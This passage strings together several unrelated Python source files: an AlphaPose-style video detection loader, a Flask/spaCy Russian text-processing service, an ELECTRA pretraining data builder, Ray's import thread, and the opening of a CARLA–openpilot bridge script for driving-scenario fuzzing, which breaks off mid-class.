inps, pt1, pt2 = crop_from_dets(inp, boxes, inps, pt1, pt2)
while self.Q.full():
time.sleep(0.2)
self.Q.put((inps, orig_img, im_name, boxes, scores, pt1, pt2))
def read(self):
# return next frame in the queue
return self.Q.get()
def len(self):
# return queue len
return self.Q.qsize()
class VideoDetectionLoader:
def __init__(self, path, batchSize=4, queueSize=256):
# initialize the file video stream along with the boolean
# used to indicate if the thread should be stopped or not
self.det_model = Darknet("yolo/cfg/yolov3-spp.cfg")
self.det_model.load_weights('models/yolo/yolov3-spp.weights')
self.det_model.net_info['height'] = opt.inp_dim
self.det_inp_dim = int(self.det_model.net_info['height'])
assert self.det_inp_dim % 32 == 0
assert self.det_inp_dim > 32
self.det_model.cuda()
self.det_model.eval()
self.stream = cv2.VideoCapture(path)
assert self.stream.isOpened(), 'Cannot capture source'
self.stopped = False
self.batchSize = batchSize
self.datalen = int(self.stream.get(cv2.CAP_PROP_FRAME_COUNT))
leftover = 0
if (self.datalen) % batchSize:
leftover = 1
self.num_batches = self.datalen // batchSize + leftover
# initialize the queue used to store frames read from
# the video file
self.Q = Queue(maxsize=queueSize)
def length(self):
return self.datalen
def len(self):
return self.Q.qsize()
def start(self):
# start a thread to read frames from the file video stream
t = Thread(target=self.update, args=())
t.daemon = True
t.start()
return self
def update(self):
# keep looping the whole video
for i in range(self.num_batches):
img = []
inp = []
orig_img = []
im_name = []
im_dim_list = []
for k in range(i*self.batchSize, min((i + 1)*self.batchSize, self.datalen)):
(grabbed, frame) = self.stream.read()
# if the `grabbed` boolean is `False`, then we have
# reached the end of the video file
if not grabbed:
self.stop()
return
# process and add the frame to the queue
inp_dim = int(opt.inp_dim)
img_k, orig_img_k, im_dim_list_k = prep_frame(frame, inp_dim)
inp_k = im_to_torch(orig_img_k)
img.append(img_k)
inp.append(inp_k)
orig_img.append(orig_img_k)
im_dim_list.append(im_dim_list_k)
with torch.no_grad():
ht = inp[0].size(1)
wd = inp[0].size(2)
# Human Detection
img = Variable(torch.cat(img)).cuda()
im_dim_list = torch.FloatTensor(im_dim_list).repeat(1,2)
im_dim_list = im_dim_list.cuda()
prediction = self.det_model(img, CUDA=True)
# NMS process
dets = dynamic_write_results(prediction, opt.confidence,
opt.num_classes, nms=True, nms_conf=opt.nms_thesh)
if isinstance(dets, int) or dets.shape[0] == 0:
for k in range(len(inp)):
while self.Q.full():
time.sleep(0.2)
self.Q.put((inp[k], orig_img[k], None, None))
continue
im_dim_list = torch.index_select(im_dim_list,0, dets[:, 0].long())
scaling_factor = torch.min(self.det_inp_dim / im_dim_list, 1)[0].view(-1, 1)
# coordinate transfer
dets[:, [1, 3]] -= (self.det_inp_dim - scaling_factor * im_dim_list[:, 0].view(-1, 1)) / 2
dets[:, [2, 4]] -= (self.det_inp_dim - scaling_factor * im_dim_list[:, 1].view(-1, 1)) / 2
dets[:, 1:5] /= scaling_factor
for j in range(dets.shape[0]):
dets[j, [1, 3]] = torch.clamp(dets[j, [1, 3]], 0.0, im_dim_list[j, 0])
dets[j, [2, 4]] = torch.clamp(dets[j, [2, 4]], 0.0, im_dim_list[j, 1])
boxes = dets[:, 1:5].cpu()
scores = dets[:, 5:6].cpu()
for k in range(len(inp)):
while self.Q.full():
time.sleep(0.2)
self.Q.put((inp[k], orig_img[k], boxes[dets[:,0]==k], scores[dets[:,0]==k]))
def videoinfo(self):
# indicate the video info
fourcc=int(self.stream.get(cv2.CAP_PROP_FOURCC))
fps=self.stream.get(cv2.CAP_PROP_FPS)
frameSize=(int(self.stream.get(cv2.CAP_PROP_FRAME_WIDTH)),int(self.stream.get(cv2.CAP_PROP_FRAME_HEIGHT)))
return (fourcc,fps,frameSize)
def read(self):
# return next frame in the queue
return self.Q.get()
def more(self):
# return True if there are still frames in the queue
return self.Q.qsize() > 0
def stop(self):
# indicate that the thread should be stopped
self.stopped = True
class WebcamLoader:
def __init__(self, webcam, queueSize=256):
# initialize the file video stream along with the boolean
# used to indicate if the thread should be stopped or not
self.stream = cv2.VideoCapture(int(webcam))
assert self.stream.isOpened(), 'Cannot capture source'
self.stopped = False
# initialize the queue used to store frames read from
# the video file
self.Q = LifoQueue(maxsize=queueSize)
def start(self):
# start a thread to read frames from the file video stream
t = Thread(target=self.update, args=())
t.daemon = True
t.start()
return self
def update(self):
# keep looping infinitely
while True:
# otherwise, ensure the queue has room in it
if not self.Q.full():
# read the next frame from the file
(grabbed, frame) = self.stream.read()
# if the `grabbed` boolean is `False`, then we have
# reached the end of the video file
if not grabbed:
self.stop()
return
# process and add the frame to the queue
inp_dim = int(opt.inp_dim)
img, orig_img, dim = prep_frame(frame, inp_dim)
inp = im_to_torch(orig_img)
im_dim_list = torch.FloatTensor([dim]).repeat(1, 2)
self.Q.put((img, orig_img, inp, im_dim_list))
else:
with self.Q.mutex:
self.Q.queue.clear()
def videoinfo(self):
# indicate the video info
fourcc=int(self.stream.get(cv2.CAP_PROP_FOURCC))
fps=self.stream.get(cv2.CAP_PROP_FPS)
frameSize=(int(self.stream.get(cv2.CAP_PROP_FRAME_WIDTH)),int(self.stream.get(cv2.CAP_PROP_FRAME_HEIGHT)))
return (fourcc,fps,frameSize)
def read(self):
# return next frame in the queue
return self.Q.get()
def len(self):
# return queue size
return self.Q.qsize()
def stop(self):
# indicate that the thread should be stopped
self.stopped = True
class DataWriter:
def __init__(self, save_video=False,
savepath='examples/res/1.avi', fourcc=cv2.VideoWriter_fourcc(*'XVID'), fps=25, frameSize=(640,480),
queueSize=1024, format='yolo'):
if save_video:
# initialize the file video stream along with the boolean
# used to indicate if the thread should be stopped or not
self.stream = cv2.VideoWriter(savepath, fourcc, fps, frameSize)
assert self.stream.isOpened(), 'Cannot open video for writing'
self.save_video = save_video
self.stopped = False
self.final_result = []
self.format = format
# initialize the queue used to store frames read from
# the video file
self.Q = Queue(maxsize=queueSize)
if opt.save_img:
if not os.path.exists(opt.outputpath + '/vis'):
os.mkdir(opt.outputpath + '/vis')
def start(self):
# start a thread to read frames from the file video stream
t = Thread(target=self.update, args=())
t.daemon = True
t.start()
return self
def update(self):
# keep looping infinitely
while True:
# if the thread indicator variable is set, stop the
# thread
if self.stopped:
if self.save_video:
self.stream.release()
return
# otherwise, ensure the queue is not empty
if not self.Q.empty():
(boxes, scores, hm_data, pt1, pt2, orig_img, im_name) = self.Q.get()
orig_img = np.array(orig_img, dtype=np.uint8)
if boxes is None:
if opt.save_img or opt.save_video or opt.vis:
img = orig_img
if opt.vis:
cv2.imshow("AlphaPose Demo", img)
cv2.waitKey(30)
if opt.save_img:
cv2.imwrite(os.path.join(opt.outputpath, 'vis', im_name), img)
if opt.save_video:
self.stream.write(img)
else:
# location prediction (n, kp, 2) | score prediction (n, kp, 1)
if opt.matching:
preds = getMultiPeakPrediction(
hm_data, pt1.numpy(), pt2.numpy(), opt.inputResH, opt.inputResW, opt.outputResH, opt.outputResW)
result = matching(boxes, scores.numpy(), preds)
else:
preds_hm, preds_img, preds_scores = getPrediction(
hm_data, pt1, pt2, opt.inputResH, opt.inputResW, opt.outputResH, opt.outputResW)
result = pose_nms(
boxes, scores, preds_img, preds_scores)
result = {
'imgname': im_name,
'result': result
}
self.final_result.append(result)
if opt.save_img or opt.save_video or opt.vis:
img = vis_frame(orig_img, result, format_=self.format)
if opt.vis:
cv2.imshow("AlphaPose Demo", img)
cv2.waitKey(30)
if opt.save_img:
cv2.imwrite(os.path.join(opt.outputpath, 'vis', im_name), img)
if opt.save_video:
self.stream.write(img)
else:
time.sleep(0.1)
def running(self):
# indicate that the thread is still running
time.sleep(0.2)
return not self.Q.empty()
def save(self, boxes, scores, hm_data, pt1, pt2, orig_img, im_name):
# save next frame in the queue
self.Q.put((boxes, scores, hm_data, pt1, pt2, orig_img, im_name))
def stop(self):
# indicate that the thread should be stopped
self.stopped = True
time.sleep(0.2)
def results(self):
# return final result
return self.final_result
def len(self):
# return queue len
return self.Q.qsize()
class Mscoco(data.Dataset):
def __init__(self, train=True, sigma=1,
scale_factor=(0.2, 0.3), rot_factor=40, label_type='Gaussian', format='yolo'):
self.img_folder = '../data/coco/images' # root image folders
self.is_train = train # training set or test set
self.inputResH = opt.inputResH
self.inputResW = opt.inputResW
self.outputResH = opt.outputResH
self.outputResW = opt.outputResW
self.sigma = sigma
self.scale_factor = scale_factor
self.rot_factor = rot_factor
self.label_type = label_type
self.nJoints_coco = opt.nClasses
self.nJoints_mpii = 16
self.nJoints = opt.nClasses
if format == 'yolo':
self.accIdxs = (1, 2, 3, 4, 5, 6, 7, 8,
9, 10, 11, 12, 13, 14, 15, 16, 17)
self.flipRef = ((2, 3), (4, 5), (6, 7),
(8, 9), (10, 11), (12, 13),
(14, 15), (16, 17))
elif format == 'mtcnn':
self.accIdxs = tuple(range(1, opt.nClasses + 1))
self.flipRef = ((1, 33), (2, 32), (3, 31), (4, 30), (5, 29), (6, 28), (7, 27), (8, 26), (9, 25), (10, 24), (11, 23), (12, 22), (13, 21), (14, 20), (15, 19), (16, 18),
(34, 47), (35, 46), (36, 45), (37, 44), (38, 43), (39, 51), (40, 50), (41, 49), (42, 48),
(52, 65), (53, 64), (54, 63), (55, 62), (56, 67), (57, 66), (58, 68), (59, 69), (60, 70), (61, 71),
(76, 77), (78, 79), (80, 81), (82, 86), (83, 85),
(87, 91), (97, 98), (93, 94), (96, 95), (88, 90), (99, 101), (102, 104), (105, 106))
def __getitem__(self, index):
pass
def __len__(self):
pass
def crop_from_dets(img, boxes, inps, pt1, pt2):
'''
Crop human from origin image according to Dectecion Results
'''
imght = img.size(1)
imgwidth = img.size(2)
tmp_img = img
tmp_img[0].add_(-0.406)
tmp_img[1].add_(-0.457)
tmp_img[2].add_(-0.480)
for i, box in enumerate(boxes):
upLeft = torch.Tensor(
(float(box[0]), float(box[1])))
bottomRight = torch.Tensor(
(float(box[2]), float(box[3])))
ht = bottomRight[1] - upLeft[1]
width = bottomRight[0] - upLeft[0]
scaleRate = 0.3
upLeft[0] = max(0, upLeft[0] - width * scaleRate / 2)
upLeft[1] = max(0, upLeft[1] - ht * scaleRate / 2)
bottomRight[0] = max(
min(imgwidth - 1, bottomRight[0] + width * scaleRate / 2), upLeft[0] + 5)
bottomRight[1] = max(
min(imght - 1, bottomRight[1] + ht * scaleRate / 2), upLeft[1] + 5)
try:
inps[i] = cropBox(tmp_img.clone(), upLeft, bottomRight, opt.inputResH, opt.inputResW)
except IndexError:
print(tmp_img.shape)
print(upLeft)
print(bottomRight)
print('===')
pt1[i] = upLeft
pt2[i] = bottomRight
return inps, pt1, pt2
|
yagami.py
|
#!/usr/bin/env python3
print("[YAGAMI] importing libraries")
import sys
import os
import json
import requests
from typing import List
from cleantext import clean
import spacy
import threading
import queue
from flask import Flask, request, json
print("[YAGAMI] defining constants")
# URL to submit processed strings
URL_BASE = "http://127.0.0.1:32000"
URL_CLEAN = URL_BASE + "/text"
URL_STATUS = URL_BASE + "/status"
YAGAMI_HOST = "localhost"
YAGAMI_PORT = 32393
# Session for requests
s = requests.session()
s.verify = False
# This is for worker to work through
workerQueue = queue.Queue()
print("[YAGAMI] loading dictionaries")
# ---------- RUSSIAN SPACY -------------
# Check here: https://spacy.io/models/ru
# --------------------------------------
# nlp_ru = spacy.load("ru_core_news_sm") # lightweight
nlp_ru = spacy.load("ru_core_news_lg") # heavylifter
app = Flask(__name__)
@app.route("/", methods=["GET"])
def hello():
name = request.args.get("name", "World")
return f"[YAGAMI] Hello, {name}!"
@app.route("/process", methods=["POST"])
def process():
if not request.is_json:
return "Expected a json with a text key"
data = request.get_json(force=True)
if data is None:
return "JSON parsing failed"
print(f"[YAGAMI] Put a new worker job: {data['title']}")
workerQueue.put(data)
return "success"
CHUNK_SIZE = 100_000
def fragmentize(text: str) -> List[str]:
to_return = []
for i in range(0, len(text), CHUNK_SIZE):
to_return.append(text[i : i + CHUNK_SIZE])
return to_return
def worker():
while True:
data = workerQueue.get()
fragments = fragmentize(data["text"])
print(f"[YAGAMI] {data['url']} got fragmented into {len(fragments)} pieces")
for i, fragment in enumerate(fragments):
print(f"[YAGAMI] Sending {data['title']} with count = {i}")
p_analyze(
data["ip"],
data["url"],
int(data["status"]),
data["start"],
i,
data["crawler"],
data["title"],
fragment,
)
print(f"[YAGAMI] Worker completed {data['title']}")
def p_analyze(
ip: str,
url: str,
status: int,
start: str,
count: int,
crawler: str,
title: str,
text: str,
):
clean_text = clean_text_f(text)
doc = nlp_ru(clean_text)
# word_tokens = nltk.word_tokenize(clean_text, language="russian")
# num_words = len(word_tokens)
# sent_tokens = nltk.sent_tokenize(clean_text, language="russian")
# num_sentences = len(sent_tokens)
num_sentences = len([sent for sent in doc.sents])
num_words = len([True for token in doc if token.is_alpha])
shapes = " ".join(([token.shape_ for token in doc]))
tags = " ".join(([token.tag_ for token in doc]))
lemmas = " ".join(([token.lemma_ for token in doc]))
to_send_text = " ".join(([token.text for token in doc]))
to_return = {
"original": clean_text,
"text": to_send_text,
"shapes": shapes,
"tags": tags,
"lemmas": lemmas,
"title": title,
"ip": ip,
"url": f"{url}#{count}",
"status": status,
"start": f"{start}",
"name": crawler,
"num_words": num_words,
"num_sentences": num_sentences,
}
final_json = json.dumps(to_return, ensure_ascii=False, sort_keys=True)
# self.file.write(final_json)
try:
s.post(
URL_CLEAN,
data=final_json.encode("utf-8"),
headers=getSpiderHeaders("LOCAL"),
)
except Exception as e:
print("Failed to send a text payload:", e)
def getSpiderHeaders(spiderName):
return {
"User-Agent": spiderName,
"Accept": "*/*",
"Connection": "keep-alive",
"Content-Type": "application/json",
"Authorization": "cool_local_key",
}
def clean_text_f(dirty_text: str) -> str:
"""
Cleans up the text from annoying newlines, tabs, whitespaces, and
extra glyphs.
"""
# Use the text cleaner to remove scary stuff
return clean(
dirty_text,
fix_unicode=True,
to_ascii=False,
lower=False,
no_line_breaks=True,
no_urls=True,
no_emails=True,
no_phone_numbers=True,
no_numbers=False,
no_digits=False,
no_currency_symbols=False,
no_punct=False,
no_emoji=False,
replace_with_punct="",
replace_with_url="<URL>",
replace_with_email="<EMAIL>",
replace_with_phone_number="<PHONE>",
replace_with_number="<NUMBER>",
replace_with_digit="0",
replace_with_currency_symbol="<CUR>",
lang="en",
)
if __name__ == "__main__":
wrk = threading.Thread(target=worker, args=(), name="Scapy worker")
wrk.start()
print("[YAGAMI] Started the spacy worker")
app.run(host=YAGAMI_HOST, port=YAGAMI_PORT, debug=False)
|
build_pretraining_dataset.py
|
# coding=utf-8
# Copyright 2020 The Google Research Authors.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
"""Writes out text data as tfrecords that ELECTRA can be pre-trained on."""
import argparse
import multiprocessing
import os
import random
import time
import tensorflow.compat.v1 as tf
from model import tokenization
from util import utils
def create_int_feature(values):
feature = tf.train.Feature(int64_list=tf.train.Int64List(value=list(values)))
return feature
class ExampleBuilder(object):
"""Given a stream of input text, creates pretraining examples."""
def __init__(self, tokenizer, max_length):
self._tokenizer = tokenizer
self._current_sentences = []
self._current_length = 0
self._max_length = max_length
self._target_length = max_length
def add_line(self, line):
"""Adds a line of text to the current example being built."""
line = line.strip().replace("\n", " ")
if (not line) and self._current_length != 0: # empty lines separate docs
return self._create_example()
bert_tokens = self._tokenizer.tokenize(line)
bert_tokids = self._tokenizer.convert_tokens_to_ids(bert_tokens)
self._current_sentences.append(bert_tokids)
self._current_length += len(bert_tokids)
if self._current_length >= self._target_length:
return self._create_example()
return None
def _create_example(self):
"""Creates a pre-training example from the current list of sentences."""
# small chance to only have one segment as in classification tasks
if random.random() < 0.1:
first_segment_target_length = 100000
else:
# -3 due to not yet having [CLS]/[SEP] tokens in the input text
first_segment_target_length = (self._target_length - 3) // 2
first_segment = []
second_segment = []
for sentence in self._current_sentences:
# the sentence goes to the first segment if (1) the first segment is
# empty, (2) the sentence doesn't put the first segment over length or
# (3) 50% of the time when it does put the first segment over length
if (len(first_segment) == 0 or
len(first_segment) + len(sentence) < first_segment_target_length or
(len(second_segment) == 0 and
len(first_segment) < first_segment_target_length and
random.random() < 0.5)):
first_segment += sentence
else:
second_segment += sentence
# trim to max_length while accounting for not-yet-added [CLS]/[SEP] tokens
first_segment = first_segment[:self._max_length - 2]
second_segment = second_segment[:max(0, self._max_length -
len(first_segment) - 3)]
# prepare to start building the next example
self._current_sentences = []
self._current_length = 0
# small chance for random-length instead of max_length-length example
if random.random() < 0.05:
self._target_length = random.randint(5, self._max_length)
else:
self._target_length = self._max_length
return self._make_tf_example(first_segment, second_segment)
def _make_tf_example(self, first_segment, second_segment):
"""Converts two "segments" of text into a tf.train.Example."""
vocab = self._tokenizer.vocab
input_ids = [vocab["[CLS]"]] + first_segment + [vocab["[SEP]"]]
segment_ids = [0] * len(input_ids)
if second_segment:
input_ids += second_segment + [vocab["[SEP]"]]
segment_ids += [1] * (len(second_segment) + 1)
input_mask = [1] * len(input_ids)
input_ids += [0] * (self._max_length - len(input_ids))
input_mask += [0] * (self._max_length - len(input_mask))
segment_ids += [0] * (self._max_length - len(segment_ids))
tf_example = tf.train.Example(features=tf.train.Features(feature={
"input_ids": create_int_feature(input_ids),
"input_mask": create_int_feature(input_mask),
"segment_ids": create_int_feature(segment_ids)
}))
return tf_example
class ExampleWriter(object):
"""Writes pre-training examples to disk."""
def __init__(self, job_id, vocab_file, output_dir, max_seq_length,
num_jobs, blanks_separate_docs, do_lower_case,
num_out_files=1000, strip_accents=True):
self._blanks_separate_docs = blanks_separate_docs
tokenizer = tokenization.FullTokenizer(
vocab_file=vocab_file,
do_lower_case=do_lower_case,
strip_accents=strip_accents)
self._example_builder = ExampleBuilder(tokenizer, max_seq_length)
self._writers = []
for i in range(num_out_files):
if i % num_jobs == job_id:
output_fname = os.path.join(
output_dir, "pretrain_data.tfrecord-{:}-of-{:}".format(
i, num_out_files))
self._writers.append(tf.io.TFRecordWriter(output_fname))
self.n_written = 0
def write_examples(self, input_file):
"""Writes out examples from the provided input file."""
with tf.io.gfile.GFile(input_file) as f:
for line in f:
line = line.strip()
if line or self._blanks_separate_docs:
example = self._example_builder.add_line(line)
if example:
self._writers[self.n_written % len(self._writers)].write(
example.SerializeToString())
self.n_written += 1
example = self._example_builder.add_line("")
if example:
self._writers[self.n_written % len(self._writers)].write(
example.SerializeToString())
self.n_written += 1
def finish(self):
for writer in self._writers:
writer.close()
def write_examples(job_id, args):
"""A single process creating and writing out pre-processed examples."""
def log(*args):
msg = " ".join(map(str, args))
print("Job {}:".format(job_id), msg)
log("Creating example writer")
example_writer = ExampleWriter(
job_id=job_id,
vocab_file=args.vocab_file,
output_dir=args.output_dir,
max_seq_length=args.max_seq_length,
num_jobs=args.num_processes,
blanks_separate_docs=args.blanks_separate_docs,
do_lower_case=args.do_lower_case,
strip_accents=args.strip_accents,
num_out_files=args.num_out_files,
)
log("Writing tf examples")
fnames = sorted(tf.io.gfile.listdir(args.corpus_dir))
fnames = [f for (i, f) in enumerate(fnames)
if i % args.num_processes == job_id]
random.shuffle(fnames)
start_time = time.time()
for file_no, fname in enumerate(fnames):
if file_no > 0:
elapsed = time.time() - start_time
log("processed {:}/{:} files ({:.1f}%), ELAPSED: {:}s, ETA: {:}s, "
"{:} examples written".format(
file_no, len(fnames), 100.0 * file_no / len(fnames), int(elapsed),
int((len(fnames) - file_no) / (file_no / elapsed)),
example_writer.n_written))
example_writer.write_examples(os.path.join(args.corpus_dir, fname))
example_writer.finish()
log("Done!")
def main():
parser = argparse.ArgumentParser(description=__doc__)
parser.add_argument("--corpus-dir", required=True,
help="Location of pre-training text files.")
parser.add_argument("--vocab-file", required=True,
help="Location of vocabulary file.")
parser.add_argument("--output-dir", required=True,
help="Where to write out the tfrecords.")
parser.add_argument("--max-seq-length", default=128, type=int,
help="Number of tokens per example.")
parser.add_argument("--num-processes", default=1, type=int,
help="Parallelize across multiple processes.")
parser.add_argument("--blanks-separate-docs", default=True, type=bool,
help="Whether blank lines indicate document boundaries.")
parser.add_argument("--num_out_files", default=1000, type=int,
help="Number of output files.")
# toggle lower-case
parser.add_argument("--do-lower-case", dest='do_lower_case',
action='store_true', help="Lower case input text.")
parser.add_argument("--no-lower-case", dest='do_lower_case',
action='store_false', help="Don't lower case input text.")
# toggle strip-accents
parser.add_argument("--do-strip-accents", dest='strip_accents',
action='store_true', help="Strip accents (default).")
parser.add_argument("--no-strip-accents", dest='strip_accents',
action='store_false', help="Don't strip accents.")
# set defaults for toggles
parser.set_defaults(do_lower_case=True)
parser.set_defaults(strip_accents=True)
args = parser.parse_args()
utils.rmkdir(args.output_dir)
if args.num_processes == 1:
write_examples(0, args)
else:
jobs = []
for i in range(args.num_processes):
job = multiprocessing.Process(target=write_examples, args=(i, args))
jobs.append(job)
job.start()
for job in jobs:
job.join()
if __name__ == "__main__":
main()
|
import_thread.py
|
from collections import defaultdict
import threading
import traceback
import redis
import ray
from ray import ray_constants
from ray import cloudpickle as pickle
from ray import profiling
from ray import utils
import logging
logger = logging.getLogger(__name__)
class ImportThread:
"""A thread used to import exports from the driver or other workers.
Note: The driver also has an import thread, which is used only to import
custom class definitions from calls to _register_custom_serializer that
happen under the hood on workers.
Attributes:
worker: the worker object in this process.
mode: worker mode
redis_client: the redis client used to query exports.
threads_stopped (threading.Event): A threading event used to signal to
the thread that it should exit.
imported_collision_identifiers: This is a dictionary mapping collision
identifiers for the exported remote functions and actor classes to
the number of times that collision identifier has appeared. This is
used to provide good error messages when the same function or class
is exported many times.
"""
def __init__(self, worker, mode, threads_stopped):
self.worker = worker
self.mode = mode
self.redis_client = worker.redis_client
self.threads_stopped = threads_stopped
self.imported_collision_identifiers = defaultdict(int)
def start(self):
"""Start the import thread."""
self.t = threading.Thread(target=self._run, name="ray_import_thread")
# Making the thread a daemon causes it to exit
# when the main thread exits.
self.t.daemon = True
self.t.start()
def join_import_thread(self):
"""Wait for the thread to exit."""
self.t.join()
def _run(self):
import_pubsub_client = self.redis_client.pubsub()
# Exports that are published after the call to
# import_pubsub_client.subscribe and before the call to
# import_pubsub_client.listen will still be processed in the loop.
import_pubsub_client.subscribe("__keyspace@0__:Exports")
# Keep track of the number of imports that we've imported.
num_imported = 0
try:
# Get the exports that occurred before the call to subscribe.
export_keys = self.redis_client.lrange("Exports", 0, -1)
for key in export_keys:
num_imported += 1
self._process_key(key)
while True:
# Exit if we received a signal that we should stop.
if self.threads_stopped.is_set():
return
msg = import_pubsub_client.get_message()
if msg is None:
self.threads_stopped.wait(timeout=0.01)
continue
if msg["type"] == "subscribe":
continue
assert msg["data"] == b"rpush"
num_imports = self.redis_client.llen("Exports")
assert num_imports >= num_imported
for i in range(num_imported, num_imports):
num_imported += 1
key = self.redis_client.lindex("Exports", i)
self._process_key(key)
except (OSError, redis.exceptions.ConnectionError) as e:
logger.error("ImportThread: {}".format(e))
finally:
# Close the pubsub client to avoid leaking file descriptors.
import_pubsub_client.close()
def _get_import_info_for_collision_detection(self, key):
"""Retrieve the collision identifier, type, and name of the import."""
if key.startswith(b"RemoteFunction"):
collision_identifier, function_name = (self.redis_client.hmget(
key, ["collision_identifier", "function_name"]))
return (collision_identifier, ray.utils.decode(function_name),
"remote function")
elif key.startswith(b"ActorClass"):
collision_identifier, class_name = self.redis_client.hmget(
key, ["collision_identifier", "class_name"])
return collision_identifier, ray.utils.decode(class_name), "actor"
def _process_key(self, key):
"""Process the given export key from redis."""
# Handle the driver case first.
if self.mode != ray.WORKER_MODE:
if key.startswith(b"FunctionsToRun"):
with profiling.profile("fetch_and_run_function"):
self.fetch_and_execute_function_to_run(key)
# If the same remote function or actor definition appears to be
# exported many times, then print a warning. We only issue this
# warning from the driver so that it is only triggered once instead
# of many times. TODO(rkn): We may want to push this to the driver
# through Redis so that it can be displayed in the dashboard more
# easily.
elif (key.startswith(b"RemoteFunction")
or key.startswith(b"ActorClass")):
collision_identifier, name, import_type = (
self._get_import_info_for_collision_detection(key))
self.imported_collision_identifiers[collision_identifier] += 1
if (self.imported_collision_identifiers[collision_identifier]
== ray_constants.DUPLICATE_REMOTE_FUNCTION_THRESHOLD):
logger.warning(
"The %s '%s' has been exported %s times. It's "
"possible that this warning is accidental, but this "
"may indicate that the same remote function is being "
"defined repeatedly from within many tasks and "
"exported to all of the workers. This can be a "
"performance issue and can be resolved by defining "
"the remote function on the driver instead. See "
"https://github.com/ray-project/ray/issues/6240 for "
"more discussion.", import_type, name,
ray_constants.DUPLICATE_REMOTE_FUNCTION_THRESHOLD)
# Return because FunctionsToRun are the only things that
# the driver should import.
return
if key.startswith(b"RemoteFunction"):
with profiling.profile("register_remote_function"):
(self.worker.function_actor_manager.
fetch_and_register_remote_function(key))
elif key.startswith(b"FunctionsToRun"):
with profiling.profile("fetch_and_run_function"):
self.fetch_and_execute_function_to_run(key)
elif key.startswith(b"ActorClass"):
# Keep track of the fact that this actor class has been
# exported so that we know it is safe to turn this worker
# into an actor of that class.
self.worker.function_actor_manager.imported_actor_classes.add(key)
# TODO(rkn): We may need to bring back the case of
# fetching actor classes here.
else:
raise Exception("This code should be unreachable.")
def fetch_and_execute_function_to_run(self, key):
"""Run on arbitrary function on the worker."""
(job_id, serialized_function,
run_on_other_drivers) = self.redis_client.hmget(
key, ["job_id", "function", "run_on_other_drivers"])
if (utils.decode(run_on_other_drivers) == "False"
and self.worker.mode == ray.SCRIPT_MODE
and job_id != self.worker.current_job_id.binary()):
return
try:
# FunctionActorManager may call pickle.loads at the same time.
# Importing the same module in different threads causes deadlock.
with self.worker.function_actor_manager.lock:
# Deserialize the function.
function = pickle.loads(serialized_function)
# Run the function.
function({"worker": self.worker})
except Exception:
# If an exception was thrown when the function was run, we record
# the traceback and notify the scheduler of the failure.
traceback_str = traceback.format_exc()
# Log the error message.
utils.push_error_to_driver(
self.worker,
ray_constants.FUNCTION_TO_RUN_PUSH_ERROR,
traceback_str,
job_id=ray.JobID(job_id))
|
bridge_customized.py
|
#!/usr/bin/env python3
# fuzzing parameter
# motorcycle leading
# not clear lane
# other vehicles block the views of the lanes
# other vehicle cut in lane
# start at high speed (npc at high speed)
# leading car stop/continue at traffic light (same lane and different lane)
# radar input? moving pedestrian
# ego car change lane?
# 155', 53
# 152', 53
# 148', 54
# 142', 56
# 134.9', 60,
# 120.6', 67,
# 106.2', 78,
# 90', 101
# 44;, 343
# 63', 178
# 90', 100
# 118', 68
# ground friction , weather , leading speed,
# ego car speed limit, angle limit
# connect svl simulator + apollo (json scenario for scenario interface? spawn point issue not moving issue? more compatible AutoFuzz interface)
# writing further improvement based on reviews
# 1.mechanism of longitudinal control (camera + lidar), mechansim of latitudianal control (camera)
# 2.think about coverage and output-based bug creteria
# print prediction of camera and radar separately
# no lanelines mode
# read code for longitudinal/lateral planning/control
# look into radar implementation for filtering out stationary objects
# check supercombo input output
# integrate matlab fusion
# -5.install cudnn in docker
# -4.radar output per frame, analyze mot case output
# -1.study failure cases and reason (crossing pedestrian, maybe the forward vehicle change lane, the forward vehicle turn case, and try on some other maps for going out of road) and explore the reasons
# 0.communication variable for control to start; separate actor initialization and behavior
# 1.study warnings and OP limitation list to build scenarios where warnings fail
# 2.fuzzing based on code logic + output feedback coverage VS baselines
# 3.look for other fusion algorithms and integrate them into OP
# 4.analysis of failure cases by fuzzing (clustering)
# ./CarlaUE4.sh -opengl -nosound -quality-level=Epic
# ./launch_openpilot.sh
# ./bridge_customized.py
# ./tmux_script.sh
import argparse
import atexit
import carla # pylint: disable=import-error
import math
import numpy as np
import time
import threading
from cereal import log
from typing import Any
import cereal.messaging as messaging
from common.params import Params
from common.realtime import Ratekeeper, DT_DMON
from lib.can import can_function
from selfdrive.car.honda.values import CruiseButtons
from selfdrive.test.helpers import set_params_enabled
# addition:
from object_types import WEATHERS, car_types, large_car_types, motorcycle_types, cyclist_types, vehicle_colors
import shutil
from matplotlib import pyplot as plt
from utils import generate_actors, activate_actors, collect_carla_data, destroy, print_and_write, dist, change_lane, get_speed, radar_callback
parser = argparse.ArgumentParser(description='Bridge between CARLA and openpilot.')
parser.add_argument('--joystick', action='store_true')
parser.add_argument('--low_quality', action='store_true')
parser.add_argument('--town', type=str, default='Town06_Opt')
parser.add_argument('--spawn_point', dest='num_selected_spawn_point',
type=int, default=16)
# addition
parser.add_argument('--data_folder', dest='data_folder',
type=str, default='data_folder')
args = parser.parse_args()
W, H = 1164, 874
REPEAT_COUNTER = 5
PRINT_DECIMATION = 100
STEER_RATIO = 15.
# addition: from openpilot/selfdrive/config.py
RADAR_TO_CAMERA = 1.52 # RADAR is ~ 1.5m ahead from center of mesh frame
pm = messaging.PubMaster(['roadCameraState', 'sensorEvents', 'can', "gpsLocationExternal"])
# modification
# sm = messaging.SubMaster(['carControl','controlsState', 'modelV2'])
sm = messaging.SubMaster(['carControl','controlsState', 'modelV2', 'fcwData', 'radardData'])
# addition
import os
SAVE_DATA_PER_FRAMES = 1
save_folder = args.data_folder
if os.path.exists(save_folder):
shutil.rmtree(save_folder)
os.mkdir(save_folder)
if os.path.exists(save_folder+'/'+'.txt'):
os.remove(save_folder+'/'+'model_output.txt')
for sub_name in ['front', 'top']:
sub_folder = os.path.join(save_folder, sub_name)
if not os.path.exists(sub_folder):
os.mkdir(sub_folder)
class VehicleState:
def __init__(self):
self.speed = 0
self.angle = 0
self.bearing_deg = 0.0
self.vel = carla.Vector3D()
self.cruise_button= 0
self.is_engaged=False
# addition:
self.radar_data = []
# responsibility & scenario design & fuzzing objective & Apollo version
